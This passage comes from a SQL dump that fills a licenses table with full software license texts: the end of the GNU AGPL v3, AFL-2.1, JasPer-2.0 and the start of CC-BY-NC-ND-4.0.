to run it.\n\nThe \"Corresponding Source\" for a work in object code form means all the source\ncode needed to generate, install, and (for an executable work) run the object\ncode and to modify the work, including scripts to control those activities.\nHowever, it does not include the work\'s System Libraries, or general-purpose\ntools or generally available free programs which are used unmodified in performing\nthose activities but which are not part of the work. For example, Corresponding\nSource includes interface definition files associated with source files for\nthe work, and the source code for shared libraries and dynamically linked\nsubprograms that the work is specifically designed to require, such as by\nintimate data communication or control flow between those\n\n subprograms and other parts of the work.\n\nThe Corresponding Source need not include anything that users can regenerate\nautomatically from other parts of the Corresponding Source.\n\n The Corresponding Source for a work in source code form is that same work.\n\n 2. Basic Permissions.\n\nAll rights granted under this License are granted for the term of copyright\non the Program, and are irrevocable provided the stated conditions are met.\nThis License explicitly affirms your unlimited permission to run the unmodified\nProgram. The output from running a covered work is covered by this License\nonly if the output, given its content, constitutes a covered work. This License\nacknowledges your rights of fair use or other equivalent, as provided by copyright\nlaw.\n\nYou may make, run and propagate covered works that you do not convey, without\nconditions so long as your license otherwise remains in force. You may convey\ncovered works to others for the sole purpose of having them make modifications\nexclusively for you, or provide you with facilities for running those works,\nprovided that you comply with the terms of this License in conveying all material\nfor which you do not control copyright. Those thus making or running the covered\nworks for you must do so exclusively on your behalf, under your direction\nand control, on terms that prohibit them from making any copies of your copyrighted\nmaterial outside their relationship with you.\n\nConveying under any other circumstances is permitted solely under the conditions\nstated below. Sublicensing is not allowed; section 10 makes it unnecessary.\n\n 3. Protecting Users\' Legal Rights From Anti-Circumvention Law.\n\nNo covered work shall be deemed part of an effective technological measure\nunder any applicable law fulfilling obligations under article 11 of the WIPO\ncopyright treaty adopted on 20 December 1996, or similar laws prohibiting\nor restricting circumvention of such measures.\n\nWhen you convey a covered work, you waive any legal power to forbid circumvention\nof technological measures to the extent such circumvention is effected by\nexercising rights under this License with respect to the covered work, and\nyou disclaim any intention to limit operation or modification of the work\nas a means of enforcing, against the work\'s users, your or third parties\'\nlegal rights to forbid circumvention of technological measures.\n\n 4. Conveying Verbatim Copies.\n\nYou may convey verbatim copies of the Program\'s source code as you receive\nit, in any medium, provided that you conspicuously and appropriately publish\non each copy an appropriate copyright notice; keep intact all notices stating\nthat this License and any non-permissive terms added in accord with section\n7 apply to the code; keep intact all notices of the absence of any warranty;\nand give all recipients a copy of this License along with the Program.\n\nYou may charge any price or no price for each copy that you convey, and you\nmay offer support or warranty protection for a fee.\n\n 5. Conveying Modified Source Versions.\n\nYou may convey a work based on the Program, or the modifications to produce\nit from the Program, in the form of source code under the terms of section\n4, provided that you also meet all of these conditions:\n\na) The work must carry prominent notices stating that you modified it, and\ngiving a relevant date.\n\nb) The work must carry prominent notices stating that it is released under\nthis License and any conditions added under section 7. This requirement modifies\nthe requirement in section 4 to \"keep intact all notices\".\n\nc) You must license the entire work, as a whole, under this License to anyone\nwho comes into possession of a copy. This License will therefore apply, along\nwith any applicable section 7 additional terms, to the whole of the work,\nand all its parts, regardless of how they are packaged. This License gives\nno permission to license the work in any other way, but it does not invalidate\nsuch permission if you have separately received it.\n\nd) If the work has interactive user interfaces, each must display Appropriate\nLegal Notices; however, if the Program has interactive interfaces that do\nnot display Appropriate Legal Notices, your work need not make them do so.\n\nA compilation of a covered work with other separate and independent works,\nwhich are not by their nature extensions of the covered work, and which are\nnot combined with it such as to form a larger program, in or on a volume of\na storage or distribution medium, is called an \"aggregate\" if the compilation\nand its resulting copyright are not used to limit the access or legal rights\nof the compilation\'s users beyond what the individual works permit. Inclusion\nof a covered work in an aggregate does not cause this License to apply to\nthe other parts of the aggregate.\n\n 6. Conveying Non-Source Forms.\n\nYou may convey a covered work in object code form under the terms of sections\n4 and 5, provided that you also convey the machine-readable Corresponding\nSource under the terms of this License, in one of these ways:\n\na) Convey the object code in, or embodied in, a physical product (including\na physical distribution medium), accompanied by the Corresponding Source fixed\non a durable physical medium customarily used for software interchange.\n\nb) Convey the object code in, or embodied in, a physical product (including\na physical distribution medium), accompanied by a written offer, valid for\nat least three years and valid for as long as you offer spare parts or customer\nsupport for that product model, to give anyone who possesses the object code\neither (1) a copy of the Corresponding Source for all the software in the\nproduct that is covered by this License, on a durable physical medium customarily\nused for software interchange, for a price no more than your reasonable cost\nof physically performing this conveying of source, or (2) access to copy the\nCorresponding Source from a network server at no charge.\n\nc) Convey individual copies of the object code with a copy of the written\noffer to provide the Corresponding Source. This alternative is allowed only\noccasionally and noncommercially, and only if you received the object code\nwith such an offer, in accord with subsection 6b.\n\nd) Convey the object code by offering access from a designated place (gratis\nor for a charge), and offer equivalent access to the Corresponding Source\nin the same way through the same place at no further charge. You need not\nrequire recipients to copy the Corresponding Source along with the object\ncode. If the place to copy the object code is a network server, the Corresponding\nSource may be on a different server (operated by you or a third party) that\nsupports equivalent copying facilities, provided you maintain clear directions\nnext to the object code saying where to find the Corresponding Source. Regardless\nof what server hosts the Corresponding Source, you remain obligated to ensure\nthat it is available for as long as needed to satisfy these requirements.\n\ne) Convey the object code using peer-to-peer transmission, provided you inform\nother peers where the object code and Corresponding Source of the work are\nbeing offered to the general public at no charge under subsection 6d.\n\nA separable portion of the object code, whose source code is excluded from\nthe Corresponding Source as a System Library, need not be included in conveying\nthe object code work.\n\nA \"User Product\" is either (1) a \"consumer product\", which means any tangible\npersonal property which is normally used for personal, family, or household\npurposes, or (2) anything designed or sold for incorporation into a dwelling.\nIn determining whether a product is a consumer product, doubtful cases shall\nbe resolved in favor of coverage. For a particular product received by a particular\nuser, \"normally used\" refers to a typical or common use of that class of product,\nregardless of the status of the particular user or of the way in which the\nparticular user actually uses, or expects or is expected to use, the product.\nA product is a consumer product regardless of whether the product has substantial\ncommercial, industrial or non-consumer uses, unless such uses represent the\nonly significant mode of use of the product.\n\n\"Installation Information\" for a User Product means any methods, procedures,\nauthorization keys, or other information required to install and execute modified\nversions of a covered work in that User Product from a modified version of\nits Corresponding Source. The information must suffice to ensure that the\ncontinued functioning of the modified object code is in no case prevented\nor interfered with solely because modification has been made.\n\nIf you convey an object code work under this section in, or with, or specifically\nfor use in, a User Product, and the conveying occurs as part of a transaction\nin which the right of possession and use of the User Product is transferred\nto the recipient in perpetuity or for a fixed term (regardless of how the\ntransaction is characterized), the Corresponding Source conveyed under this\nsection must be accompanied by the Installation Information. But this requirement\ndoes not apply if neither you nor any third party retains the ability to install\nmodified object code on the User Product (for example, the work has been installed\nin ROM).\n\nThe requirement to provide Installation Information does not include a requirement\nto continue to provide support service, warranty, or updates for a work that\nhas been modified or installed by the recipient, or for the User Product in\nwhich it has been modified or installed. Access to a network may be denied\nwhen the modification itself materially and adversely affects the operation\nof the network or violates the rules and protocols for communication across\nthe network.\n\nCorresponding Source conveyed, and Installation Information provided, in accord\nwith this section must be in a format that is publicly documented (and with\nan implementation available to the public in source code form), and must require\nno special password or key for unpacking, reading or copying.\n\n 7. Additional Terms.\n\n\"Additional permissions\" are terms that supplement the terms of this License\nby making exceptions from one or more of its conditions. Additional permissions\nthat are applicable to the entire Program shall be treated as though they\nwere included in this License, to the extent that they are valid under applicable\nlaw. If additional permissions apply only to part of the Program, that part\nmay be used separately under those permissions, but the entire Program remains\ngoverned by this License without regard to the additional permissions.\n\nWhen you convey a copy of a covered work, you may at your option remove any\nadditional permissions from that copy, or from any part of it. (Additional\npermissions may be written to require their own removal in certain cases when\nyou modify the work.) You may place additional permissions on material, added\nby you to a covered work, for which you have or can give appropriate copyright\npermission.\n\nNotwithstanding any other provision of this License, for material you add\nto a covered work, you may (if authorized by the copyright holders of that\nmaterial) supplement the terms of this License with terms:\n\na) Disclaiming warranty or limiting liability differently from the terms of\nsections 15 and 16 of this License; or\n\nb) Requiring preservation of specified reasonable legal notices or author\nattributions in that material or in the Appropriate Legal Notices displayed\nby works containing it; or\n\nc) Prohibiting misrepresentation of the origin of that material, or requiring\nthat modified versions of such material be marked in reasonable ways as different\nfrom the original version; or\n\nd) Limiting the use for publicity purposes of names of licensors or authors\nof the material; or\n\ne) Declining to grant rights under trademark law for use of some trade names,\ntrademarks, or service marks; or\n\nf) Requiring indemnification of licensors and authors of that material by\nanyone who conveys the material (or modified versions of it) with contractual\nassumptions of liability to the recipient, for any liability that these contractual\nassumptions directly impose on those licensors and authors.\n\nAll other non-permissive additional terms are considered \"further restrictions\"\nwithin the meaning of section 10. If the Program as you received it, or any\npart of it, contains a notice stating that it is governed by this License\nalong with a term that is a further restriction, you may remove that term.\nIf a license document contains a further restriction but permits relicensing\nor conveying under this License, you may add to a covered work material governed\nby the terms of that license document, provided that the further restriction\ndoes not survive such relicensing or conveying.\n\nIf you add terms to a covered work in accord with this section, you must place,\nin the relevant source files, a statement of the additional terms that apply\nto those files, or a notice indicating where to find the applicable terms.\n\nAdditional terms, permissive or non-permissive, may be stated in the form\nof a separately written license, or stated as exceptions; the above requirements\napply either way.\n\n 8. Termination.\n\nYou may not propagate or modify a covered work except as expressly provided\nunder this License. Any attempt otherwise to propagate or modify it is void,\nand will automatically terminate your rights under this License (including\nany patent licenses granted under the third paragraph of section 11).\n\nHowever, if you cease all violation of this License, then your license from\na particular copyright holder is reinstated (a) provisionally, unless and\nuntil the copyright holder explicitly and finally terminates your license,\nand (b) permanently, if the copyright holder fails to notify you of the violation\nby some reasonable means prior to 60 days after the cessation.\n\nMoreover, your license from a particular copyright holder is reinstated permanently\nif the copyright holder notifies you of the violation by some reasonable means,\nthis is the first time you have received notice of violation of this License\n(for any work) from that copyright holder, and you cure the violation prior\nto 30 days after your receipt of the notice.\n\nTermination of your rights under this section does not terminate the licenses\nof parties who have received copies or rights from you under this License.\nIf your rights have been terminated and not permanently reinstated, you do\nnot qualify to receive new licenses for the same material under section 10.\n\n 9. Acceptance Not Required for Having Copies.\n\nYou are not required to accept this License in order to receive or run a copy\nof the Program. Ancillary propagation of a covered work occurring solely as\na consequence of using peer-to-peer transmission to receive a copy likewise\ndoes not require acceptance. However, nothing other than this License grants\nyou permission to propagate or modify any covered work. These actions infringe\ncopyright if you do not accept this License. Therefore, by modifying or propagating\na covered work, you indicate your acceptance of this License to do so.\n\n 10. Automatic Licensing of Downstream Recipients.\n\nEach time you convey a covered work, the recipient automatically receives\na license from the original licensors, to run, modify and propagate that work,\nsubject to this License. You are not responsible for enforcing compliance\nby third parties with this License.\n\nAn \"entity transaction\" is a transaction transferring control of an organization,\nor substantially all assets of one, or subdividing an organization, or merging\norganizations. If propagation of a covered work results from an entity transaction,\neach party to that transaction who receives a copy of the work also receives\nwhatever licenses to the work the party\'s predecessor in interest had or could\ngive under the previous paragraph, plus a right to possession of the Corresponding\nSource of the work from the predecessor in interest, if the predecessor has\nit or can get it with reasonable efforts.\n\nYou may not impose any further restrictions on the exercise of the rights\ngranted or affirmed under this License. For example, you may not impose a\nlicense fee, royalty, or other charge for exercise of rights granted under\nthis License, and you may not initiate litigation (including a cross-claim\nor counterclaim in a lawsuit) alleging that any patent claim is infringed\nby making, using, selling, offering for sale, or importing the Program or\nany portion of it.\n\n 11. Patents.\n\nA \"contributor\" is a copyright holder who authorizes use under this License\nof the Program or a work on which the Program is based. The work thus licensed\nis called the contributor\'s \"contributor version\".\n\nA contributor\'s \"essential patent claims\" are all patent claims owned or controlled\nby the contributor, whether already acquired or hereafter acquired, that would\nbe infringed by some manner, permitted by this License, of making, using,\nor selling its contributor version, but do not include claims that would be\ninfringed only as a consequence of further modification of the contributor\nversion. For purposes of this definition, \"control\" includes the right to\ngrant patent sublicenses in a manner consistent with the requirements of this\nLicense.\n\nEach contributor grants you a non-exclusive, worldwide, royalty-free patent\nlicense under the contributor\'s essential patent claims, to make, use, sell,\noffer for sale, import and otherwise run, modify and propagate the contents\nof its contributor version.\n\nIn the following three paragraphs, a \"patent license\" is any express agreement\nor commitment, however denominated, not to enforce a patent (such as an express\npermission to practice a patent or covenant not to s ue for patent infringement).\nTo \"grant\" such a patent license to a party means to make such an agreement\nor commitment not to enforce a patent against the party.\n\nIf you convey a covered work, knowingly relying on a patent license, and the\nCorresponding Source of the work is not available for anyone to copy, free\nof charge and under the terms of this License, through a publicly available\nnetwork server or other readily accessible means, then you must either (1)\ncause the Corresponding Source to be so available, or (2) arrange to deprive\nyourself of the benefit of the patent license for this particular work, or\n(3) arrange, in a manner consistent with the requirements of this License,\nto extend the patent\n\nlicense to downstream recipients. \"Knowingly relying\" means you have actual\nknowledge that, but for the patent license, your conveying the covered work\nin a country, or your recipient\'s use of the covered work in a country, would\ninfringe one or more identifiable patents in that country that you have reason\nto believe are valid.\n\nIf, pursuant to or in connection with a single transaction or arrangement,\nyou convey, or propagate by procuring conveyance of, a covered work, and grant\na patent license to some of the parties receiving the covered work authorizing\nthem to use, propagate, modify or convey a specific copy of the covered work,\nthen the patent license you grant is automatically extended to all recipients\nof the covered work and works based on it.\n\nA patent license is \"discriminatory\" if it does not include within the scope\nof its coverage, prohibits the exercise of, or is conditioned on the non-exercise\nof one or more of the rights that are specifically granted under this License.\nYou may not convey a covered work if you are a party to an arrangement with\na third party that is in the business of distributing software, under which\nyou make payment to the third party based on the extent of your activity of\nconveying the work, and under which the third party grants, to any of the\nparties who would receive the covered work from you, a discriminatory patent\nlicense (a) in connection with copies of the covered work conveyed by you\n(or copies made from those copies), or (b) primarily for and in connection\nwith specific products or compilations that contain the covered work, unless\nyou entered into that arrangement, or that patent license was granted, prior\nto 28 March 2007.\n\nNothing in this License shall be construed as excluding or limiting any implied\nlicense or other defenses to infringement that may otherwise be available\nto you under applicable patent law.\n\n 12. No Surrender of Others\' Freedom.\n\nIf conditions are imposed on you (whether by court order, agreement or otherwise)\nthat contradict the conditions of this License, they do not excuse you from\nthe conditions of this License. If you cannot convey a covered work so as\nto satisfy simultaneously your obligations under this License and any other\npertinent obligations, then as a consequence you may\n\nnot convey it at all. For example, if you agree to terms that obligate you\nto collect a royalty for further conveying from those to whom you convey the\nProgram, the only way you could satisfy both those terms and this License\nwould be to refrain entirely from conveying the Program.\n\n 13. Remote Network Interaction; Use with the GNU General Public License.\n\nNotwithstanding any other provision of this License, if you modify the Program,\nyour modified version must prominently offer all users interacting with it\nremotely through a computer network (if your version supports such interaction)\nan opportunity to receive the Corresponding Source of your version by providing\naccess to the Corresponding Source from a network server at no charge, through\nsome standard or customary means of facilitating copying of software. This\nCorresponding Source shall include the Corresponding Source for any work covered\nby version 3 of the GNU General Public License that is incorporated pursuant\nto the following paragraph.\n\nNotwithstanding any other provision of this License, you have permission to\nlink or combine any covered work with a work licensed under version 3 of the\nGNU General Public License into a single combined work, and to convey the\nresulting work. The terms of this License will continue to apply to the part\nwhich is the covered work, but the work with which it is combined will remain\ngoverned by version 3 of the GNU General Public License.\n\n 14. Revised Versions of this License.\n\nThe Free Software Foundation may publish revised and/or new versions of the\nGNU Affero General Public License from time to time. Such new versions will\nbe similar in spirit to the present version, but may differ in detail to address\nnew problems or concerns.\n\nEach version is given a distinguishing version number. If the Program specifies\nthat a certain numbered version of the GNU Affero General Public License \"or\nany later version\" applies to it, you have the option of following the terms\nand conditions either of that numbered version or of any later version published\nby the Free Software Foundation. If the Program does not specify a version\nnumber of the GNU Affero General Public License, you may choose any version\never published by the Free Software Foundation.\n\nIf the Program specifies that a proxy can decide which future versions of\nthe GNU Affero General Public License can be used, that proxy\'s public statement\nof acceptance of a version permanently authorizes you to choose that version\nfor the Program.\n\nLater license versions may give you additional or different permissions. However,\nno additional obligations are imposed on any author or copyright holder as\na result of your choosing to follow a later version.\n\n 15. Disclaimer of Warranty.\n\nTHERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE\nLAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR\nOTHER PARTIES PROVIDE THE PROGRAM \"AS IS\" WITHOUT WARRANTY OF ANY KIND, EITHER\nEXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\nOF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS\nTO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM\nPROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR\nCORRECTION.\n\n 16. Limitation of Liability.\n\nIN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL\nANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS THE PROGRAM\nAS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL,\nINCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO\nUSE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED\nINACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE\nPROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER\nPARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\n\n 17. Interpretation of Sections 15 and 16.\n\nIf the disclaimer of warranty and limitation of liability provided above cannot\nbe given local legal effect according to their terms, reviewing courts shall\napply local law that most closely approximates an absolute waiver of all civil\nliability in connection with the Program, unless a warranty or assumption\nof liability accompanies a copy of the Program in return for a fee. END OF\nTERMS AND CONDITIONS\n\nHow to Apply These Terms to Your New Programs\n\nIf you develop a new program, and you want it to be of the greatest possible\nuse to the public, the best way to achieve this is to make it free software\nwhich everyone can redistribute and change under these terms.\n\nTo do so, attach the following notices to the program. It is safest to attach\nthem to the start of each source file to most effectively state the exclusion\nof warranty; and each file should have at least the \"copyright\" line and a\npointer to where the full notice is found.\n\n<one line to give the program\'s name and a brief idea of what it does.>\n\nCopyright (C) <year> <name of author>\n\nThis program is free software: you can redistribute it and/or modify it under\nthe terms of the GNU Affero General Public License as published by the Free\nSoftware Foundation, either version 3 of the License, or (at your option)\nany later version.\n\nThis program is distributed in the hope that it will be useful, but WITHOUT\nANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\nFOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more\ndetails.\n\nYou should have received a copy of the GNU Affero General Public License along\nwith this program. If not, see <http s ://www.gnu.org/licenses/>.\n\nAlso add information on how to contact you by electronic and paper mail.\n\nIf your software can interact with users remotely through a computer network,\nyou should also make sure that it provides a way for users to get its source.\nFor example, if your program is a web application, its interface could display\na \"Source\" link that leads users to an archive of the code. There are many\nways you could offer source, and different solutions will be better for different\nprograms; see section 13 for the specific requirements.\n\nYou should also get your employer (if you work as a programmer) or school,\nif any, to sign a \"copyright disclaimer\" for the program, if necessary. For\nmore information on this, and how to apply and follow the GNU AGPL, see <http\ns ://www.gnu.org/licenses/>.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(245,'AFL-2.1','The Academic Free License\n\nv.2.1 This Academic Free License (the \"License\") applies to any original work\nof authorship (the \"Original Work\") whose owner (the \"Licensor\") has placed\nthe following notice immediately following the copyright notice for the Original\nWork:\n\nLicensed under the Academic Free License version 2.1\n\n1) Grant of Copyright License. Licensor hereby grants You a world-wide, royalty-free,\nnon-exclusive, perpetual, sublicenseable license to do the following:\n\n a) to reproduce the Original Work in copies;\n\nb) to prepare derivative works (\"Derivative Works\") based upon the Original\nWork;\n\nc) to distribute copies of the Original Work and Derivative Works to the public;\n\n d) to perform the Original Work publicly; and\n\n e) to display the Original Work publicly.\n\n2) Grant of Patent License. Licensor hereby grants You a world-wide, royalty-free,\nnon-exclusive, perpetual, sublicenseable license, under patent claims owned\nor controlled by the Licensor that are embodied in the Original Work as furnished\nby the Licensor, to make, use, sell and offer for sale the Original Work and\nDerivative Works.\n\n3) Grant of Source Code License. The term \"Source Code\" means the preferred\nform of the Original Work for making modifications to it and all available\ndocumentation describing how to modify the Original Work. Licensor hereby\nagrees to provide a machine-readable copy of the Source Code of the Original\nWork along with each copy of the Original Work that Licensor distributes.\nLicensor reserves the right to satisfy this obligation by placing a machine-readable\ncopy of the Source Code in an information repository reasonably calculated\nto permit inexpensive and convenient access by You for as long as Licensor\ncontinues to distribute the Original Work, and by publishing the address of\nthat information repository in a notice immediately following the copyright\nnotice that applies to the Original Work.\n\n4) Exclusions From License Grant. Neither the names of Licensor, nor the names\nof any contributors to the Original Work, nor any of their trademarks or service\nmarks, may be used to endorse or promote products derived from this Original\nWork without express prior written permission of the Licensor. Nothing in\nthis License shall be deemed to grant any rights to trademarks, copyrights,\npatents, trade secrets or any other intellectual property of Licensor except\nas expressly stated herein. No patent license is granted to make, use, sell\nor offer to sell embodiments of any patent claims other than the licensed\nclaims defined in Section 2. No right is granted to the trademarks of Licensor\neven if such marks are included in the Original Work. Nothing in this License\nshall be interpreted to prohibit Licensor from licensing under different terms\nfrom this License any Original Work that Licensor otherwise would have a right\nto license.\n\n 5) This section intentionally omitted.\n\n6) Attribution Rights. You must retain, in the Source Code of any Derivative\nWorks that You create, all copyright, patent or trademark notices from the\nSource Code of the Original Work, as well as any notices of licensing and\nany descriptive text identified therein as an \"Attribution Notice.\" You must\ncause the Source Code for any Derivative Works that You create to carry a\nprominent Attribution Notice reasonably calculated to inform recipients that\nYou have modified the Original Work.\n\n7) Warranty of Provenance and Disclaimer of Warranty. Licensor warrants that\nthe copyright in and to the Original Work and the patent rights granted herein\nby Licensor are owned by the Licensor or are sublicensed to You under the\nterms of this License with the permission of the contributor(s) of those copyrights\nand patent rights. Except as expressly stated in the immediately proceeding\nsentence, the Original Work is provided under this License on an \"AS IS\" BASIS\nand WITHOUT WARRANTY, either express or implied, including, without limitation,\nthe warranties of NON-INFRINGEMENT, MERCHANTABILITY or FITNESS FOR A PARTICULAR\nPURPOSE. THE ENTIRE RISK AS TO THE QUALITY OF THE ORIGINAL WORK IS WITH YOU.\nThis DISCLAIMER OF WARRANTY constitutes an essential part of this License.\nNo license to Original Work is granted hereunder except under this disclaimer.\n\n8) Limitation of Liability. Under no circumstances and under no legal theory,\nwhether in tort (including negligence), contract, or otherwise, shall the\nLicensor be liable to any person for any direct, indirect, special, incidental,\nor consequential damages of any character arising as a result of this License\nor the use of the Original Work including, without limitation, damages for\nloss of goodwill, work stoppage, computer failure or malfunction, or any and\nall other commercial damages or losses. This limitation of liability shall\nnot apply to liability for death or personal injury resulting from Licensor\'s\nnegligence to the extent applicable law prohibits such limitation. Some jurisdictions\ndo not allow the exclusion or limitation of incidental or consequential damages,\nso this exclusion and limitation may not apply to You.\n\n9) Acceptance and Termination. If You distribute copies of the Original Work\nor a Derivative Work, You must make a reasonable effort under the circumstances\nto obtain the express assent of recipients to the terms of this License. Nothing\nelse but this License (or another written agreement between Licensor and You)\ngrants You permission to create Derivative Works based upon the Original Work\nor to exercise any of the rights granted in Section 1 herein, and any attempt\nto do so except under the terms of this License (or another written agreement\nbetween Licensor and You) is expressly prohibited by U.S. copyright law, the\nequivalent laws of other countries, and by international treaty. Therefore,\nby exercising any of the rights granted to You in Section 1 herein, You indicate\nYour acceptance of this License and all of its terms and conditions.\n\n10) Termination for Patent Action. This License shall terminate automatically\nand You may no longer exercise any of the rights granted to You by this License\nas of the date You commence an action, including a cross-claim or counterclaim,\nagainst Licensor or any licensee alleging that the Original Work infringes\na patent. This termination provision shall not apply for an action alleging\npatent infringement by combinations of the Original Work with other software\nor hardware.\n\n11) Jurisdiction, Venue and Governing Law. Any action or suit relating to\nthis License may be brought only in the courts of a jurisdiction wherein the\nLicensor resides or in which Licensor conducts its primary business, and under\nthe laws of that jurisdiction excluding its conflict-of-law provisions. The\napplication of the United Nations Convention on Contracts for the International\nSale of Goods is expressly excluded. Any use of the Original Work outside\nthe scope of this License or after its termination shall be subject to the\nrequirements and penalties of the U.S. Copyright Act, 17 U.S.C. § 101 et seq.,\nthe equivalent laws of other countries, and international treaty. This section\nshall survive the termination of this License.\n\n12) Attorneys Fees. In any action to enforce the terms of this License or\nseeking damages relating thereto, the prevailing party shall be entitled to\nrecover its costs and expenses, including, without limitation, reasonable\nattorneys\' fees and costs incurred in connection with such action, including\nany appeal of such action. This section shall survive the termination of this\nLicense.\n\n13) Miscellaneous. This License represents the complete agreement concerning\nthe subject matter hereof. If any provision of this License is held to be\nunenforceable, such provision shall be reformed only to the extent necessary\nto make it enforceable.\n\n14) Definition of \"You\" in This License. \"You\" throughout this License, whether\nin upper or lower case, means an individual or a legal entity exercising rights\nunder, and complying with all of the terms of, this License. For legal entities,\n\"You\" includes any entity that controls, is controlled by, or is under common\ncontrol with you. For purposes of this definition, \"control\" means (i) the\npower, direct or indirect, to cause the direction or management of such entity,\nwhether by contract or otherwise, or (ii) ownership of fifty percent (50%)\nor more of the outstanding shares, or (iii) beneficial ownership of such entity.\n\n15) Right to Use. You may use the Original Work in all ways not otherwise\nrestricted or conditioned by this License or by law, and Licensor promises\nnot to interfere with or be responsible for such uses by You.\n\nThis license is Copyright (C) 2003-2004 Lawrence E. Rosen. All rights reserved.\n\nPermission is hereby granted to copy and distribute this license without modification.\nThis license may not be modified without the express written permission of\nits copyright owner.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(246,'JasPer-2.0','JasPer License Version 2.0\n\nCopyright (c) 2001-2006 Michael David Adams\n\nCopyright (c) 1999-2000 Image Power, Inc.\n\nCopyright (c) 1999-2000 The University of British Columbia\n\nAll rights reserved.\n\nPermission is hereby granted, free of charge, to any person (the \"User\") obtaining\na copy of this software and associated documentation files (the \"Software\"),\nto deal in the Software without restriction, including without limitation\nthe rights to use, copy, modify, merge, publish, distribute, and/or sell copies\nof the Software, and to permit persons to whom the Software is furnished to\ndo so, subject to the following conditions:\n\n1. The above copyright notices and this permission notice (which includes\nthe disclaimer below) shall be included in all copies or substantial portions\nof the Software.\n\n2. The name of a copyright holder shall not be used to endorse or promote\nproducts derived from the Software without specific prior written permission.\n\nTHIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE.\nNO USE OF THE SOFTWARE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER.\nTHE SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS \"AS IS\", WITHOUT WARRANTY\nOF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES\nOF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT OF\nTHIRD PARTY RIGHTS. IN NO EVENT SHALL THE COPYRIGHT HOLDERS BE LIABLE FOR\nANY CLAIM, OR ANY SPECIAL INDIRECT OR CONSEQUENTIAL DAMAGES, OR ANY DAMAGES\nWHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION\nOF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION\nWITH THE USE OR PERFORMANCE OF THIS SOFTWARE. NO ASSURANCES ARE PROVIDED BY\nTHE COPYRIGHT HOLDERS THAT THE SOFTWARE DOES NOT INFRINGE THE PATENT OR OTHER\nINTELLECTUAL PROPERTY RIGHTS OF ANY OTHER ENTITY. EACH COPYRIGHT HOLDER DISCLAIMS\nANY LIABILITY TO THE USER FOR CLAIMS BROUGHT BY ANY OTHER ENTITY BASED ON\nINFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR OTHERWISE. AS A CONDITION\nTO EXERCISING THE RIGHTS GRANTED HEREUNDER, EACH USER HEREBY ASSUMES SOLE\nRESPONSIBILITY TO SECURE ANY OTHER INTELLECTUAL PROPERTY RIGHTS NEEDED, IF\nANY. THE SOFTWARE IS NOT FAULT-TOLERANT AND IS NOT INTENDED FOR USE IN MISSION-CRITICAL\nSYSTEMS, SUCH AS THOSE USED IN THE OPERATION OF NUCLEAR FACILITIES, AIRCRAFT\nNAVIGATION OR COMMUNICATION SYSTEMS, AIR TRAFFIC CONTROL SYSTEMS, DIRECT LIFE\nSUPPORT MACHINES, OR WEAPONS SYSTEMS, IN WHICH THE FAILURE OF THE SOFTWARE\nOR SYSTEM COULD LEAD DIRECTLY TO DEATH, PERSONAL INJURY, OR SEVERE PHYSICAL\nOR ENVIRONMENTAL DAMAGE (\"HIGH RISK ACTIVITIES\"). THE COPYRIGHT HOLDERS SPECIFICALLY\nDISCLAIM ANY EXPRESS OR IMPLIED WARRANTY OF FITNESS FOR HIGH RISK ACTIVITIES.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0);
|
||
INSERT INTO `licenses` VALUES (247,'CC-BY-NC-ND-4.0','Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International\nCreative Commons Corporation (\"Creative Commons\") is not a law firm and does\nnot provide legal services or legal advice. Distribution of Creative Commons\npublic licenses does not create a lawyer-client or other relationship. Creative\nCommons makes its licenses and related information available on an \"as-is\"\nbasis. Creative Commons gives no warranties regarding its licenses, any material\nlicensed under their terms and conditions, or any related information. Creative\nCommons disclaims all liability for damages resulting from their use to the\nfullest extent possible.\n\nUsing Creative Commons Public Licenses\n\nCreative Commons public licenses provide a standard set of terms and conditions\nthat creators and other rights holders may use to share original works of\nauthorship and other material subject to copyright and certain other rights\nspecified in the public license below. The following considerations are for\ninformational purposes only, are not exhaustive, and do not form part of our\nlicenses.\n\nConsiderations for licensors: Our public licenses are intended for use by\nthose authorized to give the public permission to use material in ways otherwise\nrestricted by copyright and certain other rights. Our licenses are irrevocable.\nLicensors should read and understand the terms and conditions of the license\nthey choose before applying it. Licensors should also secure all rights necessary\nbefore applying our licenses so that the public can reuse the material as\nexpected. Licensors should clearly mark any material not subject to the license.\nThis includes other CC-licensed material, or material used under an exception\nor limitation to copyright. More considerations for licensors : wiki.creativecommons.org/Considerations_for_licensors\n\nConsiderations for the public: 